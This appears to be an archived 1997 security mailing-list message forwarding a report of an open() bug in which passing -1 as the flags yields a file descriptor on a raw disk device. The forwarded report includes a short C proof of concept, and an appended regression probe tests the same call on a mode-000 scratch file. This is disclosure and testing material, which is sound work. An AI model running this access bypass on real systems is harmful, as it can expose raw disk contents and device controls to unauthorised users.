From: dima@best.net (Dima Ruban)
Reply-To: dima@best.net
To: security@freebsd.org
Date: Wed, 22 Oct 1997 22:00:52 -0700 (PDT)
Subject: BoS: Possible SERIOUS bug in open()? (fwd)
Message-Id: <199710230500.WAA11569@burka.rdy.com>
Organization: HackerDome

----- Forwarded message from explorer@flame.org -----

From: explorer@flame.org
To: best-of-security@cyber.com.au
Old-X-Originally-To: To: developers@NetBSD.ORG
Date: 17 Oct 1997 10:42:13 -0000
Message-ID: <19971017104213.11040.qmail@kechara.flame.org>
Subject: BoS: Possible SERIOUS bug in open()?

This was sent to me recently...  It seems to be a pretty serious hole
in open() and permissions...

Note, in the following, open() succeeds, and ioctls are probably
executed...

/*
 * This will give you a file descriptor on a device you should not have
 * access to.  This seems really, really screwed up, since holding a fd
 * lets you do a lot of ioctls that you should not be able to do...
 */
#include <fcntl.h>	/* open() */
#include <err.h>	/* err() */

int
main(int argc, char **argv)
{
	int fd;

	/* flags = -1 (every bit set), mode = 0 */
	fd = open("/dev/rsd0a", -1, 0);
	if (fd < 0)
		err(1, "open");
	return 0;
}

----- End of forwarded message from explorer@flame.org -----

-- dima
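
Added example, not part of the original post and not FreeBSD or NetBSD code: a regression probe that repeats the reported call shape, open(path, -1, 0), against a private scratch file with all permission bits cleared, and reports whether a descriptor comes back. The helper name probe_open_flags and the /tmp/openprobe.XXXXXX template are assumptions made for this example.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum probe_result { PROBE_REFUSED, PROBE_DESCRIPTOR_GRANTED, PROBE_INCONCLUSIVE };

/* probe_open_flags() is a hypothetical helper written for this example: it clears
 * every permission bit on a private scratch file, then calls open(path, flags, 0). */
enum probe_result
probe_open_flags(int flags, int *saved_errno)
{
	char path[] = "/tmp/openprobe.XXXXXX";	/* constructed scratch path */
	enum probe_result res = PROBE_INCONCLUSIVE;
	int fd, probe;

	*saved_errno = 0;
	if ((fd = mkstemp(path)) < 0)
		return res;			/* setup failed, nothing learned */
	if (fchmod(fd, 0) == 0) {		/* mode 000: no access for anyone */
		probe = open(path, flags, 0);
		if (probe < 0) {
			*saved_errno = errno;	/* why the kernel refused */
			res = PROBE_REFUSED;
		} else {
			close(probe);
			/* euid 0 bypasses mode bits, so a grant to root proves nothing */
			if (geteuid() != 0)
				res = PROBE_DESCRIPTOR_GRANTED;
		}
	}
	close(fd);
	unlink(path);
	return res;
}

int
main(void)
{
	int e;
	enum probe_result r = probe_open_flags(-1, &e);	/* flags value from the post */
	if (r == PROBE_REFUSED)
		printf("refused: %s\n", strerror(e));
	else
		puts(r == PROBE_DESCRIPTOR_GRANTED ? "descriptor granted on a mode-000 file" : "inconclusive (setup failed or euid 0)");
	return r == PROBE_DESCRIPTOR_GRANTED;
}
```

Run it as an unprivileged user; a nonzero exit status means the kernel handed back a descriptor for a file the caller has no permission to open.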